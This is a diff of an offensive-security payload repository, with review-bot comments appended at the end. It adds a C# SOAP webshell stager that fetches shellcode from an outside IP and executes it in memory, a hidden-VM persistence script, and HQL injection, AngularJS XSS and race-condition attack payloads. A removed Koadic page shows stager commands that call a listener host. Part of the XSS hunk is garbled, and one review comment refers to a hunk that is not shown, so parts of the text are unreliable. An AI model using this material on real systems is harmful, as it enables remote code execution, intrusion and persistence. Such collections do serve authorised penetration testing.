@@ -393,6 +443,54 @@ Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName -Credential \Administrator ``` + +### Virtual Machines + +> Based on the Shadow Bunny technique. + +```ps1 +# download virtualbox +Invoke-WebRequest "https://download.virtualbox.org/virtualbox/6.1.8/VirtualBox-6.1.8-137981-Win.exe" -OutFile $env:TEMP\VirtualBox-6.1.8-137981-Win.exe + +# perform a silent install and avoid creating desktop and quick launch icons +VirtualBox-6.0.14-133895-Win.exe --silent --ignore-reboot --msiparams VBOX_INSTALLDESKTOPSHORTCUT=0,VBOX_INSTALLQUICKLAUNCHSHORTCUT=0 + +# in \Program Files\Oracle\VirtualBox\VBoxManage.exe +# Disabling notifications +.\VBoxManage.exe setextradata global GUI/SuppressMessages "all" + +# Download the Virtual machine disk +Copy-Item \\smbserver\images\shadowbunny.vhd $env:USERPROFILE\VirtualBox\IT Recovery\shadowbunny.vhd + +# Create a new VM +$vmname = "IT Recovery" +.\VBoxManage.exe createvm --name $vmname --ostype "Ubuntu" --register + +# Add a network card in NAT mode +.\VBoxManage.exe modifyvm $vmname --ioapic on # required for 64bit +.\VBoxManage.exe modifyvm $vmname --memory 1024 --vram 128 +.\VBoxManage.exe modifyvm $vmname --nic1 nat +.\VBoxManage.exe modifyvm $vmname --audio none +.\VBoxManage.exe modifyvm $vmname --graphicscontroller vmsvga +.\VBoxManage.exe modifyvm $vmname --description "Shadowbunny" + +# Mount the VHD file +.\VBoxManage.exe storagectl $vmname -name "SATA Controller" -add sata +.\VBoxManage.exe storageattach $vmname -comment "Shadowbunny Disk" -storagectl "SATA Controller" -type hdd -medium "$env:USERPROFILE\VirtualBox VMs\IT Recovery\shadowbunny.vhd" -port 0 + +# Start the VM +.\VBoxManage.exe startvm $vmname –type headless + + +# optional - adding a shared folder +# require: VirtualBox Guest Additions +.\VBoxManage.exe sharedfolder add $vmname -name shadow_c -hostpath c:\ -automount +# then mount the folder in the VM +sudo mkdir /mnt/c +sudo mount -t vboxsf shadow_c /mnt/c +``` + + 
## Domain ### User Certificate @@ -454,3 +552,4 @@ kerberos::tgt * [Persistence – Image File Execution Options Injection - @netbiosX](https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/) * [Persistence – Registry Run Keys - @netbiosX](https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/) * [Golden Certificate - NOVEMBER 15, 2021](https://pentestlab.blog/2021/11/15/golden-certificate/) +* [Beware of the Shadowbunny - Using virtual machines to persist and evade detections - Sep 23, 2020 - wunderwuzzi](https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Post Exploitation Koadic.md b/Methodology and Resources/Windows - Post Exploitation Koadic.md deleted file mode 100644 index 9caea726..00000000 --- a/Methodology and Resources/Windows - Post Exploitation Koadic.md +++ /dev/null 
@@ -1,123 +0,0 @@ -# Koadic C3 COM Command & Control - JScript RAT - -> Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. - -## Installation - -```powershell -git clone https://github.com/zerosum0x0/koadic -git submodule init -git submodule update -pip2.7 install -r requirements.txt --user -python2.7 koadic -``` - -## Set a listener - -```powershell -use stager/js/mshta -set LHOST 192.168.1.19 -set SRVPORT 4444 -run - -[>] mshta http://192.168.1.19:4444/6DX7f -``` - -```powershell -use stager/js/wmic -set LHOST 192.168.1.19 -set SRVPORT 4444 -run - -[>] wmic os get /FORMAT:"http://192.168.1.19:4444/lQGx5.xsl" -``` - -### Stagers - -Stagers hook target zombies and allow you to use implants. - -Module | Description ---------|------------ -stager/js/mshta | serves payloads using MSHTA.exe HTML Applications -stager/js/regsvr | serves payloads using regsvr32.exe COM+ scriptlets -stager/js/wmic | serves payloads using WMIC XSL -stager/js/rundll32_js | serves payloads using rundll32.exe -stager/js/disk | serves payloads using files on disk - - - -## List zombies and interact with them - -```powershell -(koadic: sta/js/wmic)$ zombies - - ID IP STATUS LAST SEEN - --- --------- ------- ------------ - 0 192.168.1.30 Alive 2018-10-04 17:07:12 - -(koadic: sta/js/wmic)$ zombies 0 - ID: 0 - Status: Alive - First Seen: 2018-10-04 17:05:00 - Last Seen: 2018-10-04 17:14:42 - IP: 192.168.1.30 - User: DESKTOP-68URA9U\CrashWin - [...] - Elevated: No - [...] -``` - -Interact with `zombies zombie_id`, get a shell with `cmdshell zombie_id`. - -```powershell -[koadic: ZOMBIE 0 (192.168.1.30) - C:\Users\CrashWin]> whoami -[*] Zombie 0: Job 1 (implant/manage/exec_cmd) created. -[+] Zombie 0: Job 1 (implant/manage/exec_cmd) completed. 
-Result for `cd C:\Users\CrashWin & whoami`: -desktop-68ura9u\crashwin -``` - -## Use an implant - -Select an implant with `use module`, then fill the `info` with `set INFO value`, finally start the module with `run`. - -```powershell -(koadic: sta/js/mshta)$ use implant/phish/password_box -(koadic: imp/phi/password_box)$ set ZOMBIE 1 -(koadic: imp/phi/password_box)$ run -Input contents: -MyStrongPassword123! -``` - -### Implants - -Implants start jobs on zombies. - -Module | Description ---------|------------ -implant/elevate/bypassuac_eventvwr | Uses enigma0x3's eventvwr.exe exploit to bypass UAC on Windows 7, 8, and 10. -implant/elevate/bypassuac_sdclt | Uses enigma0x3's sdclt.exe exploit to bypass UAC on Windows 10. -implant/fun/zombie | Maxes volume and opens The Cranberries YouTube in a hidden window. -implant/fun/voice | Plays a message over text-to-speech. -implant/gather/clipboard | Retrieves the current content of the user clipboard. -implant/gather/enum_domain_info | Retrieve information about the Windows domain. -implant/gather/hashdump_sam | Retrieves hashed passwords from the SAM hive. -implant/gather/hashdump_dc | Domain controller hashes from the NTDS.dit file. -implant/gather/user_hunter | Locate users logged on to domain computers (using Dynamic Wrapper X). -implant/inject/mimikatz_dynwrapx | Injects a reflective-loaded DLL to run powerkatz.dll (using Dynamic Wrapper X). -implant/inject/mimikatz_dotnet2js | Injects a reflective-loaded DLL to run powerkatz.dll (@tirannido DotNetToJS). -implant/inject/shellcode_excel | Runs arbitrary shellcode payload (if Excel is installed). -implant/manage/enable_rdesktop | Enables remote desktop on the target. -implant/manage/exec_cmd | Run an arbitrary command on the target, and optionally receive the output. -implant/phishing/password_box | Prompt a user to enter their password. -implant/pivot/stage_wmi | Hook a zombie on another machine using WMI. 
-implant/pivot/exec_psexec | Run a command on another machine using psexec from sysinternals. -implant/scan/tcp | Uses HTTP to scan open TCP ports on the target zombie LAN. -implant/utils/download_file | Downloads a file from the target zombie. -implant/utils/multi_module | Run a number of implants in succession. -implant/utils/upload_file | Uploads a file from the listening server to the target zombies. - -## References - -- [Pentestlab - koadic](https://pentestlab.blog/tag/koadic/) -- [zerosum0x0 Github - koadic](https://github.com/zerosum0x0/koadic) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 8743b0fc..7aa2995b 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -14,6 +14,7 @@ * [Default Writeable Folders](#default-writeable-folders) * [EoP - Looting for passwords](#eop---looting-for-passwords) * [SAM and SYSTEM files](#sam-and-system-files) + * [LAPS Settings](#laps-settings) * [HiveNightmare](#hivenightmare) * [Search for file contents](#search-for-file-contents) * [Search for a file with a certain filename](#search-for-a-file-with-a-certain-filename) @@ -394,6 +395,15 @@ samdump2 SYSTEM SAM -o sam.txt Either crack it with `john -format=NT /root/sam.txt` or use Pass-The-Hash. +### LAPS Settings + +Extract `HKLM\Software\Policies\Microsoft Services\AdmPwd` from Windows Registry. + +* LAPS Enabled: AdmPwdEnabled +* LAPS Admin Account Name: AdminAccountName +* LAPS Password Complexity: PasswordComplexity +* LAPS Password Length: PasswordLength +* LAPS Expiration Protection Enabled: PwdExpirationProtectionEnabled ### HiveNightmare diff --git a/Race Condition/README.md b/Race Condition/README.md index 2e70df87..1986c47e 100644 --- a/Race Condition/README.md +++ b/Race Condition/README.md 
@@ -41,9 +41,40 @@ 3. Now set the external HTTP header x-request: %s - :warning: This is needed by the turbo intruder 4. Click "Attack" +## Turbo Intruder 2 Requests Examples +This follwoing template can use when use have to send race condition of request2 immediately after send a request1 when the window may only be a few milliseconds. +```python +def queueRequests(target, wordlists): + engine = RequestEngine(endpoint=target.endpoint, + concurrentConnections=30, + requestsPerConnection=100, + pipeline=False + ) + request1 = ''' +POST /target-URI-1 HTTP/1.1 +Host: +Cookie: session= + +parameterName=parameterValue + ''' + + request2 = ''' +GET /target-URI-2 HTTP/1.1 +Host: +Cookie: session= + ''' + + engine.queue(request1, gate='race1') + for i in range(30): + engine.queue(request2, gate='race1') + engine.openGate('race1') + engine.complete(timeout=60) +def handleResponse(req, interesting): + table.add(req) +``` ## References * [Race Condition allows to redeem multiple times gift cards which leads to free "money" - @muon4](https://hackerone.com/reports/759247) * [Turbo Intruder: Embracing the billion-request attack - James Kettle | 25 January 2019](https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack) -* [Race Condition Bug In Web App: A Use Case - Mandeep Jadon](https://medium.com/@ciph3r7r0ll/race-condition-bug-in-web-app-a-use-case-21fd4df71f0e) \ No newline at end of file +* [Race Condition Bug In Web App: A Use Case - Mandeep Jadon](https://medium.com/@ciph3r7r0ll/race-condition-bug-in-web-app-a-use-case-21fd4df71f0e) diff --git a/SQL Injection/HQL Injection.md b/SQL Injection/HQL Injection.md index 6e8168be..97d36723 100644 --- a/SQL Injection/HQL Injection.md +++ b/SQL Injection/HQL Injection.md 
@@ -1,11 +1,18 @@ # Hibernate Query Language Injection > Hibernate ORM (Hibernate in short) is an object-relational mapping tool for the Java programming language. It provides a framework for mapping an object-oriented domain model to a relational database. - Wikipedia + ## Summary * [HQL Comments](#hql-comments) * [HQL List Columns](#hql-list-columns) * [HQL Error Based](#hql-error-based) +* [Single Quote Escaping](#single-quote-escaping) +* [$-quoted strings](#--quoted-strings) +* [DBMS Magic functions](#dbms-magic-functions) +* [Unicode](#unicode) +* [Java constants](#java-constants) +* [Methods by DBMS](#methods-by-dbms) * [References](#references) ## HQL Comments 
@@ -49,10 +56,107 @@ select blogposts0_.id as id18_, blogposts0_.author as author18_, blogposts0_.pro :warning: **HQL does not support UNION queries** +## Single Quote Escaping + +Method works for MySQL DBMS which escapes SINGLE QUOTES in strings with SLASH `\'`. + +In HQL SINGLE QUOTES is escaped in strings by doubling `''`. + +``` +'abc\''or 1=(select 1)--' +``` + +In HQL it is a string, in MySQL it is a string and additional SQL expression. + +## $-quoted strings + +Method works for DBMS which allow DOLLAR-QUOTED strings in SQL expressions: PostgreSQL, H2. + +Hibernate ORM allows identifiers starting with `$$`. + +``` +$$='$$=concat(chr(61),chr(39)) and 1=1--' +``` + +## DBMS Magic functions + +Method works for DBMS which have MAGIC FUNCTIONS which evaluate SQL expression in string parameter: PostgreSQL, Oracle. + +Hibernate allows to specify any function name in HQL expression. + +PostgreSQL has built-in function `query_to_xml('Arbitrary SQL')`. + +``` +array_upper(xpath('row',query_to_xml('select 1 where 1337>1', true, false,'')),1) +``` + +Oracle has built-in function `DBMS_XMLGEN.getxml('SQL')` + +``` +NVL(TO_CHAR(DBMS_XMLGEN.getxml('select 1 where 1337>1')),'1')!='1' +``` + +## Unicode + +Method works for DBMS which allow UNICODE delimiters (Ex. U+00A0) between SQL tokens: Microsoft SQL Server, H2. + +In Microsoft SQL SERVER `SELECT LEN([U+00A0](select[U+00A0](1))` works the same as `SELECT LEN((SELECT(1)))`; + +HQL allows UNICODE symbols in identifiers (function or parameter names). + +``` +SELECT p FROM hqli.persistent.Post p where p.name='dummy' or 1CHAR(41) and (select count(1) from sysibm.sysdummy1)>0 --')=1 and '1'='1 +``` + +## Methods by DBMS + +![image](https://user-images.githubusercontent.com/16578570/163428666-a22105a8-287c-4997-8aef-8f372a1b86e9.png) + ## References * [HQL for pentesters - February 12, 2014 - Philippe Arteau](https://blog.h3xstream.com/2014/02/hql-for-pentesters.html) * [How to put a comment into HQL (Hibernate Query Language)? 
- Thomas Bratt](https://stackoverflow.com/questions/3196975/how-to-put-a-comment-into-hql-hibernate-query-language) * [HQL : Hyperinsane Query Language - 04/06/2015 - Renaud Dubourguais](https://www.synacktiv.com/ressources/hql2sql_sstic_2015_en.pdf) * [ORM2Pwn: Exploiting injections in Hibernate ORM - Nov 26, 2015 - Mikhail Egorov](https://www.slideshare.net/0ang3el/orm2pwn-exploiting-injections-in-hibernate-orm) +* [New Methods for Exploiting ORM Injections in Java Applications - HITBSecConf2016 - Mikhail Egorov - Sergey Soldatov](https://conference.hitb.org/hitbsecconf2016ams/materials/D2T2%20-%20Mikhail%20Egorov%20and%20Sergey%20Soldatov%20-%20New%20Methods%20for%20Exploiting%20ORM%20Injections%20in%20Java%20Applications.pdf) * [HQL Injection Exploitation in MySQL - July 18, 2019 - Olga Barinova](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hql-injection-exploitation-in-mysql/) diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md index 1ee72f97..ce645d4b 100644 --- a/SQL Injection/MSSQL Injection.md +++ b/SQL Injection/MSSQL Injection.md @@ -23,6 +23,7 @@ * [MSSQL UNC path](#mssql-unc-path) * [MSSQL Make user DBA](#mssql-make-user-dba-db-admin) * [MSSQL Trusted Links](#mssql-trusted-links) +* [MSSQL List permissions](#mssql-list-permissions) ## MSSQL Comments @@ -96,7 +97,7 @@ SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Nee MSSQL 2005 SELECT name, password_hash FROM master.sys.sql_logins -SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins +SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins ``` ## MSSQL Union Based 
@@ -297,6 +298,33 @@ EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2" ``` +## List permissions + +Listing effective permissions of current user on the server. + +```sql +SELECT * FROM fn_my_permissions(NULL, 'SERVER'); +``` + +Listing effective permissions of current user on the database. + +```sql +SELECT * FROM fn_my_permissions (NULL, 'DATABASE'); +``` + +Listing effective permissions of current user on a view. + +``` +SELECT * FROM fn_my_permissions('Sales.vIndividualCustomer', 'OBJECT') ORDER BY subentity_name, permission_name; +``` + +Check if current user is a member of the specified server role. + +```sql +-- possible roles: sysadmin, serveradmin, dbcreator, setupadmin, bulkadmin, securityadmin, diskadmin, public, processadmin +SELECT is_srvrolemember('sysadmin'); +``` + ## References * [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet) @@ -306,3 +334,5 @@ EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT * [DAFT: Database Audit Framework & Toolkit - NetSPI](https://github.com/NetSPI/DAFT) * [SQL Server UNC Path Injection Cheatsheet - nullbind](https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e) * [Full MSSQL Injection PWNage - ZeQ3uL && JabAv0C - 28 January 2009](https://www.exploit-db.com/papers/12975) +* [Microsoft - sys.fn_my_permissions (Transact-SQL)](https://docs.microsoft.com/en-us/sql/relational-databases/system-functions/sys-fn-my-permissions-transact-sql?view=sql-server-ver15) +* [Microsoft - IS_SRVROLEMEMBER (Transact-SQL)](https://docs.microsoft.com/en-us/sql/t-sql/functions/is-srvrolemember-transact-sql?view=sql-server-ver15) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index ed8dd5ca..a16cb7d8 100644 
--- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -223,6 +223,12 @@ List: ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿ ``` +### Bypass using unicode + +In some languages (.NET, Python 3) regex supports unicode by default. +`\d` includes `0123456789` but also `๐๑๒๓๔๕๖๗๘๙`. + + ### Bypass filter_var() php function ```powershell diff --git a/Upload Insecure Files/Extension ASP/shell.soap b/Upload Insecure Files/Extension ASP/shell.soap new file mode 100644 index 00000000..dcac007d --- /dev/null +++ b/Upload Insecure Files/Extension ASP/shell.soap 
@@ -0,0 +1,55 @@ +<%@ WebService Language="C#" class="SoapStager"%> +using System; +using System.IO; +using System.Web; +using System.Web.Services; +using System.Net; +using System.Net.NetworkInformation; +using System.Net.Security; + +// SRC: https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap +// https://github.com/0xbad53c/webshells/tree/main/iis + +[WebService(Namespace = "http://microsoft.com/" ,Description ="SOAP Stager Webshell" , Name ="SoapStager")] +[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)] +public class SoapStager : MarshalByRefObject +{ + private static Int32 MEM_COMMIT=0x1000; + private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40; + + [System.Runtime.InteropServices.DllImport("kernel32")] + private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect); + + [System.Runtime.InteropServices.DllImport("kernel32")] + private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId); + + + [System.ComponentModel.ToolboxItem(false)] + [WebMethod] + public string loadStage() + { + string Url = "http://10.90.255.52/beacon.bin"; //your IP and location of meterpreter or other raw shellcode + byte[] rzjUFlLZh; + + IWebProxy defaultWebProxy = WebRequest.DefaultWebProxy; + defaultWebProxy.Credentials = CredentialCache.DefaultCredentials; + + // in case of HTTPS + using (WebClient webClient = new WebClient() { Proxy = defaultWebProxy }) + { + ServicePointManager.SecurityProtocol = (SecurityProtocolType)3072; + ServicePointManager.ServerCertificateValidationCallback = new RemoteCertificateValidationCallback(delegate { return true; }); + webClient.UseDefaultCredentials = true; + rzjUFlLZh = webClient.DownloadData(Url); + } + + + // Feel free to improve to PAGE_READWRITE & direct syscalls for more evasion + IntPtr fvYV5t = 
VirtualAlloc(IntPtr.Zero,(UIntPtr)rzjUFlLZh.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE); + System.Runtime.InteropServices.Marshal.Copy(rzjUFlLZh,0,fvYV5t,rzjUFlLZh.Length); + IntPtr owlqRoQI_ms = IntPtr.Zero; + IntPtr vnspR2 = CreateThread(IntPtr.Zero,UIntPtr.Zero,fvYV5t,IntPtr.Zero,0,ref owlqRoQI_ms); + + return "finished"; + } +} \ No newline at end of file diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index e5593850..0ccaea3f 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md @@ -1,13 +1,12 @@ # Upload -Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code. +> Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code. ## Summary * [Tools](#tools) * [Exploits](#exploits) - * [Defaults extensions](#defaults-extension) - * [Other extensions](#other-extensions) + * [Defaults extensions](#defaults-extensions) * [Upload tricks](#upload-tricks) * [Filename vulnerabilities](#filename-vulnerabilities) * [Picture upload with LFI](#picture-upload-with-lfi) @@ -44,7 +43,7 @@ Uploaded files may pose a significant risk if not handled correctly. A remote at .phtm .inc ``` -* ASP Server : `.asp, .aspx, .cer and .asa (IIS <= 7.5), shell.aspx;1.jpg (IIS < 7.0)` +* ASP Server : `.asp, .aspx, .cer and .asa (IIS <= 7.5), shell.aspx;1.jpg (IIS < 7.0), shell.soap` * JSP : `.jsp, .jspx, .jsw, .jsv, .jspf` * Perl: `.pl, .pm, .cgi, .lib` * Coldfusion: `.cfm, .cfml, .cfc, .dbm` 
@@ -53,18 +52,19 @@ Uploaded files may pose a significant risk if not handled correctly. A remote at - Use double extensions : `.jpg.php` - Use reverse double extension (useful to exploit Apache misconfigurations where anything with extension .php, but not necessarily ending in .php will execute code): `.php.jpg` -- Mix uppercase and lowercase : `.pHp, .pHP5, .PhAr` +- Random uppercase and lowercase : `.pHp, .pHP5, .PhAr` - Null byte (works well against `pathinfo()`) - * .php%00.gif - * .php\x00.gif - * .php%00.png - * .php\x00.png - * .php%00.jpg - * .php\x00.jpg + * `.php%00.gif` + * `.php\x00.gif` + * `.php%00.png` + * `.php\x00.png` + * `.php%00.jpg` + * `.php\x00.jpg` - Special characters * Multiple dots : `file.php......` , in Windows when a file is created with dots at the end those will be removed. - * Whitespace characters: `file.php%20` + * Whitespace characters: `file.php%20`, `file.php%0d%0a.jpg` * Right to Left Override (RTLO): `name.%E2%80%AEphp.jpg` will became `name.gpj.php`. + * Slash: `file.php/`, `file.php.\` - Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif` * `Content-Type : image/gif` * `Content-Type : image/png` 
@@ -143,4 +143,5 @@ When a ZIP/archive file is automatically decompressed after the upload * [Encoding Web Shells in PNG IDAT chunks, 04-06-2012, phil](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/) * [La PNG qui se prenait pour du PHP, 23 février 2014](https://phil242.wordpress.com/2014/02/23/la-png-qui-se-prenait-pour-du-php/) * [File Upload restrictions bypass - Haboob Team](https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf) -* [File Upload - Mahmoud M. Awali / @0xAwali](https://docs.google.com/presentation/d/1-YwXl9rhzSvvqVvE_bMZo2ab-0O5wRNTnzoihB9x6jI/edit#slide=id.ga2ef157b83_1_0) \ No newline at end of file +* [File Upload - Mahmoud M. Awali / @0xAwali](https://docs.google.com/presentation/d/1-YwXl9rhzSvvqVvE_bMZo2ab-0O5wRNTnzoihB9x6jI/edit#slide=id.ga2ef157b83_1_0) +* [IIS - SOAP](https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap) \ No newline at end of file diff --git a/XSS Injection/README.md b/XSS Injection/README.md index f17abf32..8309a2dd 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -663,6 +663,12 @@ You can bypass a single quote with ' in an on mousedown event handler Convert IP address into decimal format: IE. `http://192.168.1.1` == `http://3232235777` http://www.geektools.com/cgi-bin/ipconv.cgi +```javascript + +window["doc"+"ument"] ``` ### Bypass using javascript inside a string 
@@ -1248,3 +1255,4 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld - [mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang](https://cure53.de/fp170.pdf) - [Self Closing Script](https://twitter.com/PortSwiggerRes/status/1257962800418349056) - [Bypass < with <](https://hackerone.com/reports/639684) +- [Bypassing Signature-Based XSS Filters: Modifying Script Code](https://portswigger.net/support/bypassing-signature-based-xss-filters-modifying-script-code) diff --git a/XSS Injection/XSS in Angular.md b/XSS Injection/XSS in Angular.md index 5a2be103..629699be 100644 --- a/XSS Injection/XSS in Angular.md +++ b/XSS Injection/XSS in Angular.md 
@@ -157,6 +157,23 @@ AngularJS (without `'` single and `"` double quotes) by [@Viren](https://twitter {{x=valueOf.name.constructor.fromCharCode;constructor.constructor(x(97,108,101,114,116,40,49,41))()}} ``` +AngularJS (without `'` single and `"` double quotes and `constructor` string) + +```javascript +{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,toString()[a].fromCharCode(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}} +``` + +```javascript +{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,toString()[a].fromCodePoint(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}} +``` + +```javascript +{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);a.sub.call.call({}[a].getOwnPropertyDescriptor(a.sub.__proto__,a).value,0,toString()[a].fromCharCode(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}} +``` + +```javascript +{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);a.sub.call.call({}[a].getOwnPropertyDescriptor(a.sub.__proto__,a).value,0,toString()[a].fromCodePoint(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}} +``` ### Blind XSS
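Review bot: In the Windows - Persistence scheduled-task hunk (`@@ ... schtasks /run /tn "Device-Synchronize"`), the PowerShell block moved under `* Using Powershell` keeps the `PS C:\>` prompt on every line, so it cannot be pasted as-is; strip the prompts, as the SharPersist block in the same bullet list already does, and keep the fence indentation at two spaces so both blocks render inside their list items.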
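Review bot: The Virtual Machines hunk of Windows - Persistence.md will not run as written because of several mismatches: the download saves `VirtualBox-6.1.8-137981-Win.exe` into `$env:TEMP`, but the silent install runs `VirtualBox-6.0.14-133895-Win.exe` from the current directory; `Copy-Item` writes to `$env:USERPROFILE\VirtualBox\IT Recovery\shadowbunny.vhd` (unquoted, so the space in `IT Recovery` splits the argument) while `storageattach` reads `"$env:USERPROFILE\VirtualBox VMs\IT Recovery\shadowbunny.vhd"`; and `startvm $vmname –type headless` uses an en dash instead of `--type`. The closing `sudo mkdir` / `sudo mount` lines also execute inside the guest, not in the host PowerShell session, so they belong in a separate fence or behind a comment saying so.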
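Review bot: `Methodology and Resources/Windows - Post Exploitation Koadic.md` is deleted outright with no stub or redirect; check that no index or cross-reference in the repository still points at this filename, and either update those links in the same commit or leave a one-line page pointing at the upstream project so existing links do not break.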
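Review bot: The LAPS Settings hunk in Windows - Privilege Escalation.md names the registry values but never shows how the key is read; the sibling sections on this page put the command next to the description, so add a `reg query "HKLM\Software\Policies\Microsoft Services\AdmPwd"` line. It would also help to state that these values only reveal whether LAPS is deployed and how its password policy is configured; the managed password itself is not stored under this key.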
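Review bot: The intro of the Turbo Intruder 2 Requests hunk misdescribes the gate: every request queued on `gate='race1'` is held back and released together by `engine.openGate('race1')`, so `request2` is fired concurrently with `request1`, not "immediately after" it; say so, or queue `request1` on its own gate and open the two gates in order if sequencing is what is intended. The sentence itself needs a rewrite ("This template can be used when request2 has to be sent immediately after request1 and the window is only a few milliseconds"), blank lines are missing before the `## Turbo Intruder 2 Requests Examples` heading and before `def handleResponse`, and the empty `Host:` and `Cookie: session=` values in the sample requests should be marked as placeholders.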
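Review bot: In the HQL Injection hunk the TOC entry `[$-quoted strings](#--quoted-strings)` most likely does not resolve: GitHub drops `$` and keeps the leading hyphen, giving `#-quoted-strings`. In the Unicode section the payload depends on U+00A0 separators that are invisible in rendered text; write them as `[U+00A0]` as the Microsoft SQL Server sentence just above does, and note that `sysibm.sysdummy1` is a DB2 object although the section claims Microsoft SQL Server and H2. `## Methods by DBMS` is an image with no alt text; a markdown table would keep that content searchable. Grammar: "Method works for MySQL DBMS which escapes SINGLE QUOTES in strings with SLASH" reads better as "This method works for DBMSs that escape single quotes with a backslash (`\'`), such as MySQL", and "In HQL SINGLE QUOTES is escaped" should be "are escaped".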
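Review bot: In the MSSQL Injection hunk the new heading is `## List permissions`, but the TOC entry added in the same patch links to `#mssql-list-permissions`, so the link is dead; rename the heading to `## MSSQL List permissions` to match the sibling sections. The view example's fence is untagged while the other three use ```` ```sql ````, and `Sales.vIndividualCustomer` is an AdventureWorks sample object that deserves a "replace with your view" comment. The curly-quote fix (`‘-’` to `'-'`) in the password-hash query at line 97 is a real correction and is worth a mention in the commit message.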
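Review bot: The `Bypass using unicode` section in Server Side Request Forgery/README.md states the regex behaviour but not the remedy; add that `[0-9]`, or an ASCII-only mode (`re.ASCII` in Python 3, `RegexOptions.ECMAScript` in .NET), restricts `\d` to ASCII digits so validators do not accept `๐๑๒๓๔๕๖๗๘๙`. There are also two trailing blank lines before `### Bypass filter_var() php function` where the file uses one.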
